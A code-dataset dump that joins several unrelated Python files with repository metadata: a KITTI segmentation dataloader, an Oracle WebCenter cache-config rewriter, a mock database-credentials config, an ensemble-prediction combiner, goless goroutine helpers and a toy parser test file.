] | null | null | null | core/data/dataloader/upb_kitti.py | nemodrive/awesome-semantic-segmentation-pytorch | fa0e4174004822ace0560cc046c2fbdb81f1e1b9 | [
"Apache-2.0"
] | null | null | null | """Pascal VOC Semantic Segmentation Dataset."""
import os

import numpy as np
import torch
from PIL import Image
from torch.utils.data.sampler import Sampler

from .segbase import SegmentationDataset
class VOCSegmentation(SegmentationDataset):
    """KITTI self-supervised road-segmentation dataset in a VOC-style layout.

    Despite the class name (kept for backward compatibility with existing
    callers), this loader reads KITTI self-supervised labels organised like
    Pascal VOC: ``labels/JPEGImages`` for images, ``labels/SegmentationClass``
    for hard masks and ``labels/SoftRoadGaussianLabels`` for soft path masks.
    Each split file line is ``<relative image path>,<driving command>``.

    Parameters
    ----------
    root : string
        Path to the dataset root folder.
    split: string
        'train', 'val' or 'test'
    transform : callable, optional
        A function that transforms the image
    """
    BASE_DIR = 'labels'
    NUM_CLASS = 1  # 1 for soft labels

    def __init__(self, root='/HDD1_2TB/storage/kitti_self_supervised_labels', split='train', mode=None, transform=None,
                 **kwargs):
        # Bug fix: the original called super(KITTISegmentation, self) -- a name
        # never defined in this module -- which raised NameError on __init__.
        super(VOCSegmentation, self).__init__(root, split, mode, transform, **kwargs)
        _voc_root = os.path.join(root, self.BASE_DIR)
        _mask_dir = os.path.join(_voc_root, 'SegmentationClass')
        _image_dir = os.path.join(_voc_root, 'JPEGImages')
        _path_mask_dir = os.path.join(_voc_root, 'SoftRoadGaussianLabels')
        # train/val/test splits are pre-cut
        _splits_dir = os.path.join(_voc_root, 'ImageSets/Segmentation')
        if split == 'train':
            _split_f = os.path.join(_splits_dir, 'train')
        elif split == 'val':
            _split_f = os.path.join(_splits_dir, 'val')
        elif split == 'test':
            _split_f = os.path.join(_splits_dir, 'test')
        else:
            raise RuntimeError('Unknown dataset split.')
        self.images = []
        self.masks = []
        self.path_masks = []
        self.cmds = []
        with open(os.path.join(_split_f), "r") as lines:
            for line in lines:
                file_name = line.split(',')[0]
                cmd = line.split(',')[1]
                _image = os.path.join(_image_dir, file_name)
                assert os.path.isfile(_image)
                # Mask files use backslash-flattened names of the image path.
                _path_mask = os.path.join(_path_mask_dir, file_name.replace('/', '\\'))
                assert os.path.isfile(_path_mask)
                self.images.append(_image)
                self.path_masks.append(_path_mask)
                self.cmds.append(cmd)
                if split != 'test':
                    _mask = os.path.join(_mask_dir, file_name.replace('/', '\\'))
                    assert os.path.isfile(_mask)
                    self.masks.append(_mask)
        if split != 'test':
            assert (len(self.images) == len(self.masks))
        print('Found {} images in the folder {}'.format(len(self.images), _voc_root))

    def __getitem__(self, index):
        """Return (img, filename) in 'test' mode, otherwise
        (img, mask, path_mask, image path)."""
        img = Image.open(self.images[index]).convert('RGB')
        if self.mode == 'test':
            img = self._img_transform(img)
            if self.transform is not None:
                img = self.transform(img)
            return img, os.path.basename(self.images[index])
        mask = Image.open(self.masks[index]).quantize(self.num_class + 1)  # 1 for train or 2 for eval
        path_mask = Image.open(self.path_masks[index]).convert('RGB')
        # synchronized transform
        if self.mode == 'train':
            img, mask, path_mask = self._sync_transform(img, mask, path_mask)
        elif self.mode == 'val':
            img, mask, path_mask = self._val_sync_transform(img, mask, path_mask)
        else:
            assert self.mode == 'testval'
            img, mask = self._img_transform(img), self._mask_transform(mask)
        # general resize, normalize and toTensor
        if self.transform is not None:
            img = self.transform(img)
        # Bug fix: the original used torchvision's transforms.ToTensor() here,
        # but ``transforms`` is never imported in this module (NameError).  The
        # same conversion is done with numpy/torch: HWC uint8 [0,255] -> CHW
        # float [0,1].  Assumes path_mask is still an RGB PIL image (or uint8
        # array) after the sync transform -- TODO confirm against segbase.
        arr = np.asarray(path_mask, dtype=np.float32) / 255.0
        path_mask = torch.from_numpy(arr.transpose(2, 0, 1).copy())
        path_mask = path_mask[1].unsqueeze(0)  # keep the green channel only
        if path_mask.max() != 0:
            path_mask = path_mask / path_mask.max()
        return img, mask, path_mask, self.images[index]

    def __len__(self):
        return len(self.images)

    def _mask_transform(self, mask):
        """Convert a PIL mask to a long tensor, mapping ignore value 255 to -1."""
        target = np.array(mask).astype('int32')
        target[target == 255] = -1
        return torch.from_numpy(target).long()

    @property
    def classes(self):
        """Category names."""
        return ('path', 'rest')
class KITTIImageSampler(Sampler):
    """Index sampler that draws dataset indices grouped by driving command.

    ``image_data`` is a sequence of per-sample command labels (ints 0-5);
    ``prob_weights`` gives the probability of drawing each command class.
    One "epoch" ends (StopIteration) after ``len(image_data)`` draws, at
    which point all per-command index lists are reshuffled.
    NOTE(review): requires ``Sampler`` (torch.utils.data) to be imported at
    module level.
    """
    def __init__(self, image_data, prob_weights):
        self.image_data = image_data
        # Get dataset length in terms of video frames and start frame for each video
        self.start_frames = []
        self.len = len(image_data)
        # Number of indices handed out since the last epoch reset.
        self.seen = 0
        # Per-command index lists and per-command read cursors.
        self.samples_cmd = {0: [], 1: [], 2: [], 3: [], 4: [], 5: []}
        self.samples_idx = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0}
        self._population = [0, 1, 2, 3, 4, 5]
        self._weights = prob_weights
        self._split_samples()
        for key in self.samples_cmd.keys():
            np.random.shuffle(self.samples_cmd[key])
    def __len__(self):
        return self.len
    def __iter__(self):
        return self
    def next(self):
        """Python 2 iterator-protocol alias for __next__."""
        return self.__next__()
    def __next__(self):
        """Draw a command class by weight, then return the next index of
        that class (cycling and reshuffling the class list when exhausted)."""
        # added this while because samples_cmd[sample_type] could be empty
        while True:
            sample_type = np.random.choice(self._population, p=self._weights)
            if self.samples_cmd[sample_type]:
                break
        idx = self.samples_cmd[sample_type][self.samples_idx[sample_type]]
        self.samples_idx[sample_type] += 1
        if self.samples_idx[sample_type] >= len(self.samples_cmd[sample_type]):
            self.samples_idx[sample_type] = 0
            np.random.shuffle(self.samples_cmd[sample_type])
        self.seen += 1
        # Epoch boundary: reshuffle everything, reset cursors and stop.
        if self.seen >= self.len:
            for key in self.samples_cmd.keys():
                np.random.shuffle(self.samples_cmd[key])
                self.samples_idx[key] = 0
            self.seen = 0
            raise StopIteration
        return idx
    def _split_samples(self):
        """Partition dataset indices into the per-command lists."""
        index = 0
        for j in range(len(self.image_data)):
            cmd = self.image_data[j]
            self.samples_cmd[cmd].append(index)
            index += 1
if __name__ == '__main__':
    # Smoke test.  Bug fix: the original instantiated ``KITTISegmentation``,
    # a name that is never defined in this module; the dataset class defined
    # above is ``VOCSegmentation``.
    dataset = VOCSegmentation()
| 36.880208 | 141 | 0.591018 | 876 | 7,081 | 4.550228 | 0.240868 | 0.044155 | 0.035123 | 0.019568 | 0.27421 | 0.223281 | 0.14576 | 0.103864 | 0.103864 | 0.103864 | 0 | 0.014173 | 0.282587 | 7,081 | 191 | 142 | 37.073298 | 0.770472 | 0.09815 | 0 | 0.130081 | 0 | 0 | 0.049421 | 0.016535 | 0 | 0 | 0 | 0 | 0.04065 | 0 | null | null | 0 | 0.04065 | null | null | 0.00813 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e7ee6d842483ab8133f076264eb1658607e7ec98 | 5,558 | py | Python | FMWKubernetesMAA/OracleEnterpriseDeploymentAutomation/OracleWebCenterSites/charts/wc-sites/unicast.py | rishiagarwal-oracle/fmw-kubernetes | cf53d0aac782cacaa26cb1f8f1cdb7130f69d64f | [
"UPL-1.0",
"MIT"
] | null | null | null | FMWKubernetesMAA/OracleEnterpriseDeploymentAutomation/OracleWebCenterSites/charts/wc-sites/unicast.py | rishiagarwal-oracle/fmw-kubernetes | cf53d0aac782cacaa26cb1f8f1cdb7130f69d64f | [
"UPL-1.0",
"MIT"
] | null | null | null | FMWKubernetesMAA/OracleEnterpriseDeploymentAutomation/OracleWebCenterSites/charts/wc-sites/unicast.py | rishiagarwal-oracle/fmw-kubernetes | cf53d0aac782cacaa26cb1f8f1cdb7130f69d64f | [
"UPL-1.0",
"MIT"
] | null | null | null | # Copyright (c) 2022, Oracle and/or its affiliates.
#
# Licensed under the Universal Permissive License v 1.0 as shown at
# https://oss.oracle.com/licenses/upl
import xml.dom.minidom
import re
import sys
def getManagedServerCount(domainHome):
    """Return the number of managed servers in the domain's config.xml
    (total <server> elements minus one for the admin server).
    Python 2 / WLST-style print statement."""
    # use the parse() function to load and parse an XML file
    doc = xml.dom.minidom.parse(domainHome + "/config/config.xml")
    servers = doc.getElementsByTagName("server")
    print "Total Configured Managed Servers: %d " % (servers.length - 1)
    return servers.length - 1;
# Method to uncomment and comment the required tag and save back
def replaceXml(domainHome, ms_server):
    """Swap which cacheManagerPeerProviderFactory element is active in the
    server's ticket-cache.xml: uncomment the cas_tgt variant and comment out
    the propertySeparator variant, rewriting the file in place.
    NOTE(review): mode "r+w" is not a standard mode string (behaves like
    "r+" on CPython 2); the rewrite also appends newlines without
    truncating, relying on the new content being at least as long.
    """
    f = open(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/ticket-cache.xml","r+w")
    filecontent = f.read()
    #Uncomment the one to be used
    filecontent = re.sub ( r'<!--<cacheManagerPeerProviderFactory','<cacheManagerPeerProviderFactory', filecontent,1)
    filecontent = re.sub ( r'cas_tgt" />-->','cas_tgt" />', filecontent,1)
    #Comment the one not used
    filecontent = re.sub ( r'<cacheManagerPeerProviderFactory','<!--cacheManagerPeerProviderFactory', filecontent,1)
    filecontent = re.sub ( r'propertySeparator="," />','propertySeparator="," -->', filecontent,1)
    f.seek(0)
    f.write(filecontent)
    f.write("\n\n\n")
    f.close()
# Method to replace the properties
def replaceRmiUrlsInCache(domainHome, prefix, n, ms_server, excludedServerNumber, filename, port):
    """Point a cache config's RMI peer list at the other managed servers.

    Sets the cacheManagerPeerProviderFactory 'properties' attribute of
    <filename> to a manual peerDiscovery list with one
    //<prefix><i>:<port>/notifier entry per peer (every server number
    1..n except excludedServerNumber), and sets the
    cacheManagerPeerListenerFactory to this server's own host and ports.

    :param domainHome: WebLogic domain home path
    :param prefix: host-name prefix; peer hosts are prefix + server number
    :param n: total number of managed servers
    :param ms_server: this managed server's name (directory under servers/)
    :param excludedServerNumber: this server's number, excluded from peers
    :param filename: cache config file name, e.g. 'linked-cache.xml'
    :param port: RMI port used in the notifier URLs
    """
    doc = xml.dom.minidom.parse(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/" + filename)
    abc = doc.getElementsByTagName("cacheManagerPeerProviderFactory")
    processString = "peerDiscovery=manual,rmiUrls=//localhost:<port>/notifier"
    # NOTE(review): processString accumulates across loop iterations, so
    # this assumes exactly one provider element per file — TODO confirm.
    for element in abc:
        element.setAttribute("properties", processString)
        # Grow the template to n-1 placeholder entries (one per peer).
        for x in range(1, n - 1):
            processString = processString + "|//localhost:<port>/notifier"
        # Fill in each peer's host and port, skipping this server.
        # '!=' replaces the Python-2-only '<>' operator.
        for i in range(1, n + 1):
            if i != int(excludedServerNumber):
                processString = re.sub(r'localhost', prefix + str(i), processString, 1)
                processString = re.sub(r'<port>', str(port), processString, 1)
        element.setAttribute("properties", processString)
        print(processString)
    ghi = doc.getElementsByTagName("cacheManagerPeerListenerFactory")
    for element in ghi:
        # This server listens on <port> for RMI, <port>+1 for remote objects.
        processString = "hostName=" + prefix + str(excludedServerNumber) + ",port=" + str(port) + ",remoteObjectPort=" + str(int(port) + 1) + ",socketTimeoutMillis=12000"
        element.setAttribute("properties", processString)
    myfile = open(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/" + filename, "w")
    myfile.write(doc.toxml())
    myfile.close()
    print("Updated " + filename)
# Method to replace the properties
def replaceRmiUrls(domainHome, prefix, n, ms_server, excludedServerNumber, port):
    """Point ticket-cache.xml's RMI peer list at the other managed servers.

    Starts from the 'properties' template already in the file (one
    //localhost:41001/cas_st|//localhost:41001/cas_tgt pair), appends a
    placeholder pair per additional peer, then fills in each peer's host
    and port. The listener factory is set to this server's own host/ports.

    :param domainHome: WebLogic domain home path
    :param prefix: host-name prefix; peer hosts are prefix + server number
    :param n: total number of managed servers
    :param ms_server: this managed server's name (directory under servers/)
    :param excludedServerNumber: this server's number, excluded from peers
    :param port: RMI port substituted for the 41001 placeholders
    """
    doc = xml.dom.minidom.parse(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/ticket-cache.xml")
    abc = doc.getElementsByTagName("cacheManagerPeerProviderFactory")
    processString = ""
    for element in abc:
        # Template shipped in the file: one cas_st/cas_tgt URL pair.
        processString = element.getAttribute("properties")
        # Append a placeholder pair for each additional peer (n-2 more).
        for x in range(1, n - 1):
            processString = processString + "|//localhost:41001/cas_st|//localhost:41001/cas_tgt"
        # Two URLs per peer, hence two substitutions of each placeholder.
        # '!=' replaces the Python-2-only '<>' operator.
        for i in range(1, n + 1):
            if i != int(excludedServerNumber):
                processString = re.sub(r'localhost', prefix + str(i), processString, 1)
                processString = re.sub(r'41001', str(port), processString, 1)
                processString = re.sub(r'localhost', prefix + str(i), processString, 1)
                processString = re.sub(r'41001', str(port), processString, 1)
        element.setAttribute("properties", processString)
        print(processString)
    ghi = doc.getElementsByTagName("cacheManagerPeerListenerFactory")
    for element in ghi:
        # This server listens on <port> for RMI, <port>+1 for remote objects.
        processString = "hostName=" + prefix + str(excludedServerNumber) + ",port=" + str(port) + ",remoteObjectPort=" + str(int(port) + 1) + ",socketTimeoutMillis=12000"
        element.setAttribute("properties", processString)
    myfile = open(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/ticket-cache.xml", "w")
    myfile.write(doc.toxml())
    myfile.close()
    print("Updated " + "ticket-cache.xml")
def main():
    """Entry point: read CLI args and rewrite the unicast cache configs.

    Expected argv: <domainHome> <serverPrefix> <ms_server> <startingPort>
    """
    # count the arguments (argv[0] is the script itself)
    arguments = len(sys.argv) - 1
    print ("The script is called with %i arguments" % (arguments))
    domainHome = sys.argv[1]
    serverPrefix = sys.argv[2]
    ms_server = sys.argv[3]
    port = sys.argv[4]
    # NOTE(review): takes only the last character of the server name, so
    # this assumes a single-digit server number suffix — TODO confirm
    # behavior for 10+ managed servers.
    excludedServerNumber = ms_server[-1]
    print("Host prefix set to " + serverPrefix)
    print("Managed Server set to - " + ms_server)
    print("Excluded Server Number set to - " + excludedServerNumber)
    print("Starting port set to - " + port)
    # Switch ticket-cache.xml to the clustered provider block first.
    replaceXml(domainHome, ms_server)
    servercount = getManagedServerCount(domainHome)
    # Each cache file gets its own port pair offset from the base port.
    replaceRmiUrls(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, port)
    replaceRmiUrlsInCache(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, "linked-cache.xml", int(port) + 2)
    replaceRmiUrlsInCache(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, "cs-cache.xml", int(port) + 4)
    replaceRmiUrlsInCache(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, "cas-cache.xml", int(port) + 6 )
    replaceRmiUrlsInCache(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, "ss-cache.xml", int(port) + 8 )

if __name__ == "__main__":
    # calling main function
    main()
| 45.933884 | 161 | 0.737496 | 656 | 5,558 | 6.204268 | 0.239329 | 0.033415 | 0.014742 | 0.02801 | 0.659951 | 0.625553 | 0.573219 | 0.483538 | 0.479607 | 0.458477 | 0 | 0.016722 | 0.128463 | 5,558 | 120 | 162 | 46.316667 | 0.823493 | 0.115869 | 0 | 0.397727 | 0 | 0 | 0.250663 | 0.140845 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.034091 | null | null | 0.113636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e7f60dd013f54bbf4fa181ff948f295cdc87e462 | 1,893 | py | Python | tests/mock_dbcli_config.py | bluelabsio/db-facts | fc8faa59f450a5cc00a0e50160ca57e47291b375 | [
"Apache-2.0"
] | 2 | 2020-11-25T20:11:50.000Z | 2020-12-12T18:39:09.000Z | tests/mock_dbcli_config.py | bluelabsio/db-facts | fc8faa59f450a5cc00a0e50160ca57e47291b375 | [
"Apache-2.0"
] | 5 | 2020-01-24T15:05:50.000Z | 2020-02-29T13:34:40.000Z | tests/mock_dbcli_config.py | bluelabsio/db-facts | fc8faa59f450a5cc00a0e50160ca57e47291b375 | [
"Apache-2.0"
] | 1 | 2021-05-16T17:07:40.000Z | 2021-05-16T17:07:40.000Z | mock_dbcli_config = {
    # Reusable credential-export methods referenced by the 'dbs' entries
    # below via their 'exports_from' key.
    'exports_from': {
        'lpass': {
            'pull_lastpass_from': "{{ lastpass_entry }}",
        },
        'lpass_user_and_pass_only': {
            'pull_lastpass_username_password_from': "{{ lastpass_entry }}",
        },
        'my-json-script': {
            'json_script': [
                'some-custom-json-script'
            ]
        },
        # Deliberately empty: exercises the no-method error path.
        'invalid-method': {
        },
    },
    # Database definitions; each one picks an export method and supplies
    # whatever extra keys that method's templates need.
    'dbs': {
        'baz': {
            'exports_from': 'my-json-script',
        },
        'bing': {
            'exports_from': 'invalid-method',
        },
        'bazzle': {
            'exports_from': 'lpass',
            'lastpass_entry': 'lpass entry name'
        },
        'bazzle-bing': {
            'exports_from': 'lpass',
            'lastpass_entry': 'different lpass entry name'
        },
        # Same lastpass entry as 'bazzle' — two dbs sharing one credential.
        'frazzle': {
            'exports_from': 'lpass',
            'lastpass_entry': 'lpass entry name'
        },
        'frink': {
            'exports_from': 'lpass_user_and_pass_only',
            'lastpass_entry': 'lpass entry name',
            'jinja_context_name': 'standard',
            'exports': {
                'some_additional': 'export',
                'a_numbered_export': 123
            },
        },
        # Inline exports only (no exports_from); uses the env + base64
        # jinja contexts to decode a service-account blob from the env.
        'gaggle': {
            'jinja_context_name': [
                'env',
                'base64',
            ],
            'exports': {
                'type': 'bigquery',
                'protocol': 'bigquery',
                'bq_account': 'bq_itest',
                'bq_service_account_json':
                "{{ env('ITEST_BIGQUERY_SERVICE_ACCOUNT_JSON_BASE64') | b64decode }}",
                'bq_default_project_id': 'bluelabs-tools-dev',
                'bq_default_dataset_id': 'bq_itest',
            },
        },
    },
    # Organization metadata keyed by short name.
    'orgs': {
        'myorg': {
            'full_name': 'MyOrg',
        },
    },
}
| 28.253731 | 86 | 0.43159 | 145 | 1,893 | 5.255172 | 0.406897 | 0.10105 | 0.104987 | 0.094488 | 0.238845 | 0.112861 | 0.112861 | 0.112861 | 0 | 0 | 0 | 0.008212 | 0.421025 | 1,893 | 66 | 87 | 28.681818 | 0.687044 | 0 | 0 | 0.106061 | 0 | 0 | 0.445325 | 0.116746 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e7fca0855906e19926ef43a259b033f9d1d6ddb0 | 542 | py | Python | transform/indexed_transform.py | cviaai/unsupervised-heartbeat-anomaly-detection | 3586bf505256463c030422607e95e4cee40fa086 | [
"MIT"
] | 2 | 2020-10-14T05:50:25.000Z | 2021-05-11T03:42:02.000Z | transform/indexed_transform.py | cviaai/unsupervised-heartbeat-anomaly-detection | 3586bf505256463c030422607e95e4cee40fa086 | [
"MIT"
] | null | null | null | transform/indexed_transform.py | cviaai/unsupervised-heartbeat-anomaly-detection | 3586bf505256463c030422607e95e4cee40fa086 | [
"MIT"
] | null | null | null | from typing import Tuple, List
from transform.transformer import TimeSeriesTransformer
import numpy as np
class IndexedTransformer:
    """Wrap a TimeSeriesTransformer and report, for each transformed
    element, the index it corresponds to in the original series.
    """
    def __init__(self, transformer: TimeSeriesTransformer, padding: int, step: int):
        self.transformer = transformer
        self.padding = padding
        self.step = step

    def __call__(self, data: np.ndarray) -> Tuple[List[int], np.ndarray]:
        transformed = self.transformer(data)
        # Element i maps back to position padding + i * step.
        positions = [self.padding + i * self.step for i in range(len(transformed))]
        return positions, transformed
| 30.111111 | 84 | 0.695572 | 67 | 542 | 5.462687 | 0.447761 | 0.122951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215867 | 542 | 17 | 85 | 31.882353 | 0.861176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.25 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
e7fca20cce05d1364eee53a17bec476012eb661d | 2,177 | py | Python | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | 26 | 2015-01-12T18:00:50.000Z | 2020-12-19T23:49:16.000Z | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | null | null | null | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | 26 | 2015-01-10T22:35:01.000Z | 2020-01-15T08:56:53.000Z | #------------------------------------------
# this script combine result of different
# nets and report final result
#------------------------------------------
import sys
import numpy as np
from util import pickle, unpickle
def evaluate_result(result, text):
    """Compute, print and return the top-1 error rate of one net's output.

    :param result: dict with 'labels' (list of 1-D true-index arrays, one
        per batch) and 'preds' (list of 2-D score arrays, one row per case)
    :param text: tag printed in front of the error rate
    :return: fraction of misclassified cases across all batches
    """
    num_batches = len(result['labels'])
    # The original asserted len(labels) == len(labels), which is always
    # true; the intended pre-condition is consistency with 'preds'.
    assert num_batches == len(result['preds'])
    num_cases = 0
    num_wrong = 0
    for ii in range(num_batches):
        act_index = result['labels'][ii]
        num_cases_ii = act_index.shape[0]
        # One prediction row per label in each batch.
        assert num_cases_ii == result['preds'][ii].shape[0]
        num_cases += num_cases_ii
        pred_index = np.argmax(result['preds'][ii], 1)
        # Vectorized mismatch count replaces the per-case Python loop.
        num_wrong += int(np.sum(pred_index != act_index))
    error = 1.0 * num_wrong / num_cases
    # print() form keeps this runnable under both Python 2 and 3; the
    # original bare print statement is a syntax error on Python 3.
    print(text + "----Testing Error: %2.4f" % error)
    return error
def main():
    """Average predictions from N result files given on argv and report
    per-net and combined error rates.

    Usage: combine_pred_mod.py <result_file_1> [<result_file_2> ...]
    """
    num_args = len(sys.argv)
    # One result file per net; argv[0] is the script name.
    num_nets = num_args - 1
    assert( num_nets > 0 )
    errors = []
    # 0th net: result['labels'] / result['preds'] are lists of per-batch
    # arrays; this first result accumulates all the others' predictions.
    result = unpickle( sys.argv[1] )
    errors.append( evaluate_result( result, sys.argv[1] ) )
    num_batches = len( result['labels'] )
    #import pdb; pdb.set_trace()
    # collect all remaining results
    for ii in range( num_nets - 1 ):
        result_ii = unpickle( sys.argv[ii+2] )
        # per-net error before combining
        errors.append( evaluate_result( result_ii, sys.argv[ii+2] ) )
        # NOTE(review): num_batches_ii is computed but never compared
        # against num_batches — presumably the intended check; confirm.
        num_batches_ii = len( result_ii['labels'] )
        for jj in range( num_batches ):
            # labels must agree across nets for summing preds to make sense
            assert( np.array_equal(
                result_ii['labels'][jj], result['labels'][jj] ) )
            # accumulate this net's scores into the running sum
            result['preds'][jj] += result_ii['preds'][jj]
    pickle( 'combine_result', result )
    # mean/std of the individual nets' error rates, in percent
    errors = np.array( errors )
    #import pdb; pdb.set_trace()
    print "mean: " , str(100*np.mean( errors )) , " std: " , str(100*(np.std( errors )))
    # error rate of the summed (ensemble) predictions
    evaluate_result( result, "After combine" )

if __name__ == "__main__":
    main()
| 30.661972 | 87 | 0.592559 | 291 | 2,177 | 4.243986 | 0.281787 | 0.051822 | 0.064777 | 0.046154 | 0.222672 | 0.02915 | 0 | 0 | 0 | 0 | 0 | 0.015682 | 0.238401 | 2,177 | 70 | 88 | 31.1 | 0.729192 | 0.216812 | 0 | 0.04878 | 0 | 0 | 0.078885 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 0 | null | null | 0 | 0.073171 | null | null | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e7fcb403c125d5647a5fdcb4339ffbade5bc81e8 | 1,556 | py | Python | goless/__init__.py | ctismer/goless | 02168a40902691264b32c7da6f453819ed7a91cf | [
"Apache-2.0"
] | 1 | 2015-05-28T03:12:47.000Z | 2015-05-28T03:12:47.000Z | goless/__init__.py | ctismer/goless | 02168a40902691264b32c7da6f453819ed7a91cf | [
"Apache-2.0"
] | null | null | null | goless/__init__.py | ctismer/goless | 02168a40902691264b32c7da6f453819ed7a91cf | [
"Apache-2.0"
] | null | null | null | """
``goless`` introduces go-like channels and select to Python,
built on top of Stackless Python (and maybe one day gevent).
Use :func:`goless.chan` to create a synchronous or buffered channel.
Use :func:`goless.select` like you would the ``Select`` function in Go's reflect package
(since Python lacks a switch/case statement, replicating Go's select statement syntax
wasn't very effective).
"""
import logging
import sys
import traceback
from .backends import current as _be
# noinspection PyUnresolvedReferences
from .channels import chan, ChannelClosed
# noinspection PyUnresolvedReferences
from .selecting import dcase, rcase, scase, select
# Package version as a tuple and its dotted-string form.
version_info = 0, 0, 1
version = '.'.join([str(v) for v in version_info])
def on_panic(etype, value, tb):
    """Handle an unhandled exception that escaped a goroutine.

    The default behavior is to log the full traceback at critical level
    and terminate the process via the backend.
    """
    formatted = traceback.format_exception(etype, value, tb)
    logging.critical(formatted)
    _be.propagate_exc(SystemExit, 1)
def go(func, *args, **kwargs):
    """Run ``func`` in a new tasklet, like a goroutine.

    If the goroutine raises an unhandled exception (*panics*),
    :func:`goless.on_panic` is invoked, which by default logs the error
    and exits the process.

    :param args: Positional arguments to ``func``.
    :param kwargs: Keyword arguments to ``func``.
    """
    def _run_guarded(target):
        # noinspection PyBroadException
        try:
            target(*args, **kwargs)
        except:
            on_panic(*sys.exc_info())

    _be.start(_run_guarded, func)
| 30.509804 | 88 | 0.703728 | 215 | 1,556 | 5.032558 | 0.534884 | 0.027726 | 0.02403 | 0.033272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00321 | 0.199229 | 1,556 | 50 | 89 | 31.12 | 0.865169 | 0.572622 | 0 | 0 | 0 | 0 | 0.001664 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e7fcf109cce1b1c57ca682a8b6f5606efb8ee46b | 643 | py | Python | data/test1.py | moses-alexander/simple-python-parser | a15f53a86d61fa5d98f5ade149d8c3a178ebfb50 | [
"BSD-3-Clause"
] | null | null | null | data/test1.py | moses-alexander/simple-python-parser | a15f53a86d61fa5d98f5ade149d8c3a178ebfb50 | [
"BSD-3-Clause"
] | null | null | null | data/test1.py | moses-alexander/simple-python-parser | a15f53a86d61fa5d98f5ade149d8c3a178ebfb50 | [
"BSD-3-Clause"
] | null | null | null | 1+2
3+5
7+8
6>7
abs(-3)
if 8 < 9: min(3,5)
else 4 < 5: abs(-2)
else 4 > 5: max(3, 7)
round(2.1)
round(3.6)
len("jfdgge")
type(4)
any(1, 3, 4)
any(0.0, 0.0, 0.0)
all("abc", "a")
all(0, 1)
bin(45)
lower("ABC")
upper("abc")
join("abc", "abc")
bool(0)
bool("abc")
ord('r')
chr(100)
str(130)
globals()
help()
hex(15)
oct(27)
pow(4,2)
sum(1,2, 3)
id(4)
id("abc")
not False
none()
none(0)
# breaks here ... for now
b = 1
print("a", b); print();
a = 5
#def append_element(self, val): newest =__Node(val);newestprev = self__trailerprev;self__trailerprevnext = newest;self__trailerprev = newest;newestnext = self__trailer;self__size = self__size + 1;
